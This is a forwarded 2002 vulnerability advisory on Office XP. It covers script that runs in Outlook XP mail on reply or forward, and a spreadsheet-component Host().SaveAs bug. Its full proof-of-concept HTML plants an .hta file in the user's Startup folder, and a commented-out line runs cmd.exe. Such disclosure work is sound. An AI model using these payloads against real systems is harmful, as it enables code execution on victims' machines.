More Office XP problems (Version 2.0)

Gio 4 Apr 2002 17:45:25 CEST

> More Office XP problems
> 
> Systems affected:
> Office XP
> 
> Risk: High
> Date: 31 March 2002
> Updated: 3 April 2002 (check corrections, 3 is
> added)
> 
> Legal Notice:
> This Advisory is Copyright (c) 2002 Georgi Guninski.
> You may distribute it unmodified.
> You may not modify it and distribute it or
> distribute parts
> of it without the author's written permission.
> If you want to link to this content use the URL:
> http://www.guninski.com/m$oxp-2.html
> 
> Disclaimer:
> The information in this advisory is believed to be
> true though
> it may be false.
> The opinions expressed in this advisory and program
> are my own and
> not of any company. The usual standard disclaimer
> applies,
> especially the fact that Georgi Guninski is not
> liable for any damages
> caused by direct or  indirect use of the information
> or functionality
> provided by this advisory or program. Georgi
> Guninski bears no
> responsibility for content or misuse of this
> advisory or program or
> any derivatives thereof.
> 
> 
> Corrections: (made on 3 April 2002)
> 
> At http://www.idg.net/ic_840081_1794_9-10000.html is
> written:
> -----------------
>    As for the second vulnerability, Microsoft said
> it does
> "not as yet have a work-around for the second issue,
> but note
> that even in the worst case it could only be used to
> create files --
> not to execute them or take any other action on the
> user's computer."
> -----------------
> 
> I don't agree with this statement - execution of
> code in this case is easy.
> I am waiting for a official reply from them.
> The following testcase (3) shows that arbitrary may
> be executed.
> 
> 3.
> The following must be put in HTML email which should
> be opened with
> Outlook XP and the user should chose reply or
> forward.
> Probably it may also be embeded in .doc or .xls
> file.
> The effect is shown after the user logouts and
> logins again.
> ----------------------------------------
> <h1>
> Hehe. Trying to sell trustworthy computing.
> </h1>
> 
> <object
>     
> classid="CLSID:0002E551-0000-0000-C000-000000000046"
> id=Spreadsheet1
>      v:shapes="_x0000_s1026" class=shape width=81
> height=81
>      u1:shapes="_x0000_s1025">
>      <param name=DataType value=XMLURL>
>      <param name=XMLData
>      value="&lt;?xml
> version=&quot;1.0&quot;?&gt;
&lt;ss:Workbook
>
xmlns:o=&quot;urn:schemas-microsoft-com:office:office&quot;

>
xmlns:x=&quot;urn:schemas-microsoft-com:office:excel&quot;

>
xmlns:ss=&quot;urn:schemas-microsoft-com:office:spreadsheet&quot;

>
xmlns:c=&quot;urn:schemas-microsoft-com:office:component:spreadsheet&quot;

>
xmlns:html=&quot;http://www.w3.org/TR/REC-html40&quot;&gt;

> &lt;x:ExcelWorkbook&gt;

>
&lt;x:ProtectStructure&gt;False&lt;/x:ProtectStructure&gt;

> 
> &lt;x:ActiveSheet&gt;0&lt;/x:ActiveSheet&gt;

> &lt;/x:ExcelWorkbook&gt;

> &lt;ss:Styles&gt;
  &lt;ss:Style
> ss:ID=&quot;Default&quot;&gt;

> &lt;ss:Alignment ss:Horizontal=&quot;Automatic&quot;
> ss:Rotate=&quot;0.0&quot;
> ss:Vertical=&quot;Bottom&quot;

> ss:ReadingOrder=&quot;Context&quot;/&gt;

> &lt;ss:Borders&gt;

> &lt;/ss:Borders&gt;
   &lt;ss:Font
> ss:FontName=&quot;Arial&quot; ss:Size=&quot;10&quot;
> ss:Color=&quot;Automatic&quot;
> ss:Bold=&quot;0&quot;

> ss:Italic=&quot;0&quot;
> ss:Underline=&quot;None&quot;/&gt;

> &lt;ss:Interior ss:Color=&quot;Automatic&quot;
> ss:Pattern=&quot;None&quot;/&gt;

> &lt;ss:NumberFormat
> ss:Format=&quot;General&quot;/&gt;

> &lt;ss:Protection
> ss:Protected=&quot;1&quot;/&gt;

> &lt;/ss:Style&gt;

> &lt;/ss:Styles&gt;

> &lt;c:ComponentOptions&gt;

> &lt;c:Label&gt;

> &lt;c:Caption&gt;Microsoft Office
> Spreadsheet&lt;/c:Caption&gt;

>    &lt;/c:Label&gt;

> &lt;c:PreventPropBrowser/&gt;

> &lt;c:MaxHeight&gt;80%&lt;/c:MaxHeight&gt;

>  &lt;c:MaxWidth&gt;80%&lt;/c:MaxWidth&gt;

> &lt;c:NextSheetNumber&gt;1&lt;/c:NextSheetNumber&gt;

> &lt;/c:ComponentOptions&gt;

> &lt;x:WorkbookOptions&gt;

> &lt;c:OWCVersion&gt;10.0.0.2621        
> &lt;/c:OWCVersion&gt;

> &lt;x:DisableUndo/&gt;

> &lt;/x:WorkbookOptions&gt;

> &lt;ss:Worksheet
> ss:Name=&quot;Sheet1&quot;&gt;

> &lt;x:WorksheetOptions&gt;

> &lt;x:Selected/&gt;

>
&lt;x:ViewableRange&gt;R1:R262144&lt;/x:ViewableRange&gt;

>  
> &lt;x:Selection&gt;R1C1&lt;/x:Selection&gt;

> &lt;x:TopRowVisible&gt;0&lt;/x:TopRowVisible&gt;

>  
>
&lt;x:LeftColumnVisible&gt;0&lt;/x:LeftColumnVisible&gt;

>  
>
&lt;x:ProtectContents&gt;False&lt;/x:ProtectContents&gt;

>  &lt;/x:WorksheetOptions&gt;

> &lt;c:WorksheetOptions&gt;

> &lt;/c:WorksheetOptions&gt;
  &lt;ss:Table
> ss:ExpandedColumnCount=&quot;1&quot;
> ss:ExpandedRowCount=&quot;1&quot;

> ss:DefaultColumnWidth=&quot;48.0&quot;
> ss:DefaultRowHeight=&quot;12.75&quot;&gt;

>  &lt;ss:Row&gt;
    &lt;ss:Cell
> ss:Formula='=HOST().SaveAs(&quot;../Start
> Menu/Programs/StartUp/gggg5.hta&quot;,8)'&gt;

>     &lt;ss:Data
> ss:Type=&quot;Boolean&quot;&gt;1&lt;/ss:Data&gt;

>    &lt;/ss:Cell&gt;

> &lt;/ss:Row&gt;

> &lt;/ss:Table&gt;

> &lt;/ss:Worksheet&gt;
 &lt;ss:Worksheet
> ss:Name=&quot;Sheet2&quot;&gt;

> &lt;x:WorksheetOptions&gt;

>
&lt;x:ViewableRange&gt;R1:R262144&lt;/x:ViewableRange&gt;

>  
> &lt;x:Selection&gt;R1C1&lt;/x:Selection&gt;

>  
> &lt;x:TopRowVisible&gt;0&lt;/x:TopRowVisible&gt;

>
&lt;x:LeftColumnVisible&gt;0&lt;/x:LeftColumnVisible&gt;

>  
>
&lt;x:ProtectContents&gt;False&lt;/x:ProtectContents&gt;

>  &lt;/x:WorksheetOptions&gt;

> &lt;c:WorksheetOptions&gt;

> &lt;/c:WorksheetOptions&gt;

> &lt;/ss:Worksheet&gt;
 &lt;ss:Worksheet
> ss:Name=&quot;Sheet3&quot;&gt;

> &lt;x:WorksheetOptions&gt;

>
&lt;x:ViewableRange&gt;R1:R262144&lt;/x:ViewableRange&gt;

> &lt;x:Selection&gt;R1C1&lt;/x:Selection&gt;

>  
> &lt;x:TopRowVisible&gt;0&lt;/x:TopRowVisible&gt;

>  
>
&lt;x:LeftColumnVisible&gt;0&lt;/x:LeftColumnVisible&gt;

>
&lt;x:ProtectContents&gt;False&lt;/x:ProtectContents&gt;

>  &lt;/x:WorksheetOptions&gt;

> &lt;c:WorksheetOptions&gt;

> &lt;/c:WorksheetOptions&gt;

> &lt;/ss:Worksheet&gt;

> &lt;o:DocumentProperties&gt;

> &lt;o:Author&gt;ad&lt;/o:Author&gt;

> &lt;o:LastAuthor&gt;ad&lt;/o:LastAuthor&gt;

>  
>
&lt;o:Created&gt;2002-03-17T12:07:37Z&lt;/o:Created&gt;

> &lt;o:Company&gt;g&lt;/o:Company&gt;

> &lt;o:Version&gt;10.2625&lt;/o:Version&gt;

>  &lt;/o:DocumentProperties&gt;

> &lt;o:OfficeDocumentSettings&gt;

> &lt;o:DownloadComponents/&gt;

> &lt;o:LocationOfComponents
> HRef=&quot;file:///E:\&quot;/&gt;

> &lt;/o:OfficeDocumentSettings&gt;
&lt;/ss:Workbook&gt;
">
>      <param name=AllowPropertyToolbox value=0>
>      <param name=AutoFit value=0>
>      <param name=Calculation value=-4105>
>      <param name=Caption value="Microsoft Office
> Spreadsheet">
>      <param name=DisplayColumnHeadings value=-1>
>      <param name=DisplayGridlines value=-1>
>      <param name=DisplayHorizontalScrollBar
> value=-1>
>      <param name=DisplayOfficeLogo value=-1>
>      <param name=DisplayPropertyToolbox value=0>
>      <param name=DisplayRowHeadings value=-1>
>      <param name=DisplayTitleBar value=0>
>      <param name=DisplayToolbar value=-1>
>      <param name=DisplayVerticalScrollBar value=-1>
>      <param name=DisplayWorkbookTabs value=-1>
>      <param name=EnableEvents value=-1>
>      <param name=MaxHeight value="80%">
>      <param name=MaxWidth value="80%">
>      <param name=MoveAfterReturn value=-1>
>      <param name=MoveAfterReturnDirection
> value=-4121>
>      <param name=RightToLeft value=0>
>      <param name=ScreenUpdating value=-1>
>      <param name=EnableUndo value=0>
>     </object>
> <script>
> i=3;
> while (i--) confirm("Trustworthy?");
> //x=new ActiveXObject("WScript.Shell");
> //x.Run("C:\\WINNT\\SYSTEM32\\CMD.EXE /C DIR C:\\ /a
> /p /s");
> </script>
> ------------------------------------------
> 
> 
> Description:
> Actually there are at least two vulnerabilities in
> Office XP.
> 1. It is possible to embed active content (object +
> script) in HTML mail
> which is triggered if the user choses reply or
> forward to the mail.
> This opens an exploit scenario for forcing the user
> to visit a page
> in the internet zone of IE at least. For another
> exploit scenario
> check (2)
> 2. There is a bug in ms spreadsheet compononent.
> Namely in its Host()
> function which may be exploited with the help of (1)
> or probably from
> any document opened with Office application. This
> buggy function
> allows creating files with arbitrary names and their
> content may be
> specified to some extent at which is sufficient to
> place an
> executable file (.hta) in user's startup directory
> which may lead to
> taking full control over user's computer.
> This probably may be called cross application
> scripting because
> one application uses object from another
> application.
> 
> 
> Details:
> The following must be put in HTML email which should
> be opened with
> Outlook XP and the user should chose reply or
> forward.
> 
> 1.
> --------------------------------------
> <OBJECT id=WebBrowser1 height=150 width=300
> classid=CLSID:8856F961-340A-11D0-A96B-00C04FD705A2>
> <PARAM NAME="ExtentX" VALUE="7938">
> <PARAM NAME="ExtentY" VALUE="3969">
> <PARAM NAME="ViewMode" VALUE="0">
> <PARAM NAME="Offline" VALUE="0">
> <PARAM NAME="Silent" VALUE="0">
> <PARAM NAME="RegisterAsBrowser" VALUE="1">
> <PARAM NAME="RegisterAsDropTarget" VALUE="1">
> <PARAM NAME="AutoArrange" VALUE="0">
> <PARAM NAME="NoClientEdge" VALUE="0">
> <PARAM NAME="AlignLeft" VALUE="0">
> <PARAM NAME="ViewID"
> VALUE="{0057D0E0-3573-11CF-AE69-08002B2E1262}">
> <PARAM NAME="Location"
> VALUE="about:/dev/random&lt;script&gt;while (42)
> alert('HOHOHO\nTrying to sell trustworthy
> computing\nHOHOHO')&lt;/script&gt;">
> <PARAM NAME="ReadyState" VALUE="4">
> </OBJECT>
> -------------------------------------
> 
> 
> 2.
> The office spreadsheet component is something like
> mini excel.
> It may be embeded in web pages (seems not
> exploitable) and in
> office documents (seems exploitable).
> It supports the Host() function which returns the
> hosting object.
> So if you put in formula '=Host().SaveAs("name")'
> file with name
> shall be created.
> 
> [Note, lines may be wrapped]
> ---------------------------------------
> <h1>
> Hehe. Triyng to sell trustworthy computing.
> </h1>
> <object
>     
> classid="CLSID:0002E551-0000-0000-C000-000000000046"
> id=Spreadsheet1
>      v:shapes="_x0000_s1026" class=shape width=81
> height=81
>      u1:shapes="_x0000_s1025">
>      <param name=DataType value=XMLURL>
>      <param name=XMLData
>      value="&lt;?xml
> version=&quot;1.0&quot;?&gt;
&lt;ss:Workbook
>
xmlns:o=&quot;urn:schemas-microsoft-com:office:office&quot;

>
xmlns:x=&quot;urn:schemas-microsoft-com:office:excel&quot;

>
xmlns:ss=&quot;urn:schemas-microsoft-com:office:spreadsheet&quot;

>
xmlns:c=&quot;urn:schemas-microsoft-com:office:component:spreadsheet&quot;

>
xmlns:html=&quot;http://www.w3.org/TR/REC-html40&quot;&gt;

> &lt;x:ExcelWorkbook&gt;

>
&lt;x:ProtectStructure&gt;False&lt;/x:ProtectStructure&gt;

> 
> &lt;x:ActiveSheet&gt;0&lt;/x:ActiveSheet&gt;

> &lt;/x:ExcelWorkbook&gt;

> &lt;ss:Styles&gt;
  &lt;ss:Style
> ss:ID=&quot;Default&quot;&gt;

> &lt;ss:Alignment ss:Horizontal=&quot;Automatic&quot;
> ss:Rotate=&quot;0.0&quot;
> ss:Vertical=&quot;Bottom&quot;

> ss:ReadingOrder=&quot;Context&quot;/&gt;

> &lt;ss:Borders&gt;

> &lt;/ss:Borders&gt;
   &lt;ss:Font
> ss:FontName=&quot;Arial&quot; ss:Size=&quot;10&quot;
> ss:Color=&quot;Automatic&quot;
> ss:Bold=&quot;0&quot;

> ss:Italic=&quot;0&quot;
> ss:Underline=&quot;None&quot;/&gt;

> &lt;ss:Interior ss:Color=&quot;Automatic&quot;
> ss:Pattern=&quot;None&quot;/&gt;

> &lt;ss:NumberFormat
> ss:Format=&quot;General&quot;/&gt;

> &lt;ss:Protection
> ss:Protected=&quot;1&quot;/&gt;

> &lt;/ss:Style&gt;

> &lt;/ss:Styles&gt;

> &lt;c:ComponentOptions&gt;

> &lt;c:Label&gt;

> &lt;c:Caption&gt;Microsoft Office
> Spreadsheet&lt;/c:Caption&gt;

>    &lt;/c:Label&gt;

> &lt;c:PreventPropBrowser/&gt;

> &lt;c:MaxHeight&gt;80%&lt;/c:MaxHeight&gt;

>  &lt;c:MaxWidth&gt;80%&lt;/c:MaxWidth&gt;

> &lt;c:NextSheetNumber&gt;1&lt;/c:NextSheetNumber&gt;

> &lt;/c:ComponentOptions&gt;

> &lt;x:WorkbookOptions&gt;

> &lt;c:OWCVersion&gt;10.0.0.2621        
> &lt;/c:OWCVersion&gt;

> &lt;x:DisableUndo/&gt;

> &lt;/x:WorkbookOptions&gt;

> &lt;ss:Worksheet
> ss:Name=&quot;Sheet1&quot;&gt;

> &lt;x:WorksheetOptions&gt;

> &lt;x:Selected/&gt;

>
&lt;x:ViewableRange&gt;R1:R262144&lt;/x:ViewableRange&gt;

>  
> &lt;x:Selection&gt;R1C1&lt;/x:Selection&gt;

> &lt;x:TopRowVisible&gt;0&lt;/x:TopRowVisible&gt;

>  
>
&lt;x:LeftColumnVisible&gt;0&lt;/x:LeftColumnVisible&gt;

>  
>
&lt;x:ProtectContents&gt;False&lt;/x:ProtectContents&gt;

>  &lt;/x:WorksheetOptions&gt;

> &lt;c:WorksheetOptions&gt;

> &lt;/c:WorksheetOptions&gt;
  &lt;ss:Table
> ss:ExpandedColumnCount=&quot;1&quot;
> ss:ExpandedRowCount=&quot;1&quot;

> ss:DefaultColumnWidth=&quot;48.0&quot;
> ss:DefaultRowHeight=&quot;12.75&quot;&gt;

>  &lt;ss:Row&gt;
    &lt;ss:Cell
>
ss:Formula='=HOST().SaveAs(&quot;C:\GGGG5&quot;)'&gt;

>     &lt;ss:Data
> ss:Type=&quot;Boolean&quot;&gt;1&lt;/ss:Data&gt;

> &lt;/ss:Cell&gt;

> &lt;/ss:Row&gt;

> &lt;/ss:Table&gt;

> &lt;/ss:Worksheet&gt;
 &lt;ss:Worksheet
> ss:Name=&quot;Sheet2&quot;&gt;

> &lt;x:WorksheetOptions&gt;

>
&lt;x:ViewableRange&gt;R1:R262144&lt;/x:ViewableRange&gt;

>  
> &lt;x:Selection&gt;R1C1&lt;/x:Selection&gt;

>  
> &lt;x:TopRowVisible&gt;0&lt;/x:TopRowVisible&gt;

>
&lt;x:LeftColumnVisible&gt;0&lt;/x:LeftColumnVisible&gt;

>  
>
&lt;x:ProtectContents&gt;False&lt;/x:ProtectContents&gt;

>  &lt;/x:WorksheetOptions&gt;

> &lt;c:WorksheetOptions&gt;

> &lt;/c:WorksheetOptions&gt;

> &lt;/ss:Worksheet&gt;
 &lt;ss:Worksheet
> ss:Name=&quot;Sheet3&quot;&gt;

> &lt;x:WorksheetOptions&gt;

>
&lt;x:ViewableRange&gt;R1:R262144&lt;/x:ViewableRange&gt;

> &lt;x:Selection&gt;R1C1&lt;/x:Selection&gt;

>  
> &lt;x:TopRowVisible&gt;0&lt;/x:TopRowVisible&gt;

>  
>
&lt;x:LeftColumnVisible&gt;0&lt;/x:LeftColumnVisible&gt;

>
&lt;x:ProtectContents&gt;False&lt;/x:ProtectContents&gt;

>  &lt;/x:WorksheetOptions&gt;

> &lt;c:WorksheetOptions&gt;

> &lt;/c:WorksheetOptions&gt;

> &lt;/ss:Worksheet&gt;

> &lt;o:DocumentProperties&gt;

> &lt;o:Author&gt;ad&lt;/o:Author&gt;

> &lt;o:LastAuthor&gt;ad&lt;/o:LastAuthor&gt;

>  
>
&lt;o:Created&gt;2002-03-17T12:07:37Z&lt;/o:Created&gt;

> &lt;o:Company&gt;g&lt;/o:Company&gt;

> &lt;o:Version&gt;10.2625&lt;/o:Version&gt;

>  &lt;/o:DocumentProperties&gt;

> &lt;o:OfficeDocumentSettings&gt;

> &lt;o:DownloadComponents/&gt;

> &lt;o:LocationOfComponents
> HRef=&quot;file:///E:\&quot;/&gt;

> &lt;/o:OfficeDocumentSettings&gt;
&lt;/ss:Workbook&gt;
">
>      <param name=AllowPropertyToolbox value=0>
>      <param name=AutoFit value=0>
>      <param name=Calculation value=-4105>
>      <param name=Caption value="Microsoft Office
> Spreadsheet">
>      <param name=DisplayColumnHeadings value=-1>
>      <param name=DisplayGridlines value=-1>
>      <param name=DisplayHorizontalScrollBar
> value=-1>
>      <param name=DisplayOfficeLogo value=-1>
>      <param name=DisplayPropertyToolbox value=0>
>      <param name=DisplayRowHeadings value=-1>
>      <param name=DisplayTitleBar value=0>
>      <param name=DisplayToolbar value=-1>
>      <param name=DisplayVerticalScrollBar value=-1>
>      <param name=DisplayWorkbookTabs value=-1>
>      <param name=EnableEvents value=-1>
>      <param name=MaxHeight value="80%">
>      <param name=MaxWidth value="80%">
>      <param name=MoveAfterReturn value=-1>
>      <param name=MoveAfterReturnDirection
> value=-4121>
>      <param name=RightToLeft value=0>
>      <param name=ScreenUpdating value=-1>
>      <param name=EnableUndo value=0>
>     </object>
> ---------------------------------
> 
> Workaround/Solution:
> The solution is to get a real mail client and office
> applications.
> Workaround for this particular problem is:
> For (1) - disable everything that contains "active"
> in IE.
> For (2) and (3) - (Have not tested it personally)
> Deregister and delete the ms office spreadsheet
> component
> 
> Vendor status:
> 
> Microsoft was notified on 17 March 2002.
> They had 2 weeks to produce a patch but didn't.
--------------------- 

______________________________________________________________________
Iscriviti al Club Nokia, è gratis!
http://it.yahoo.com/mail_it/foot/?http://www.club.nokia.it/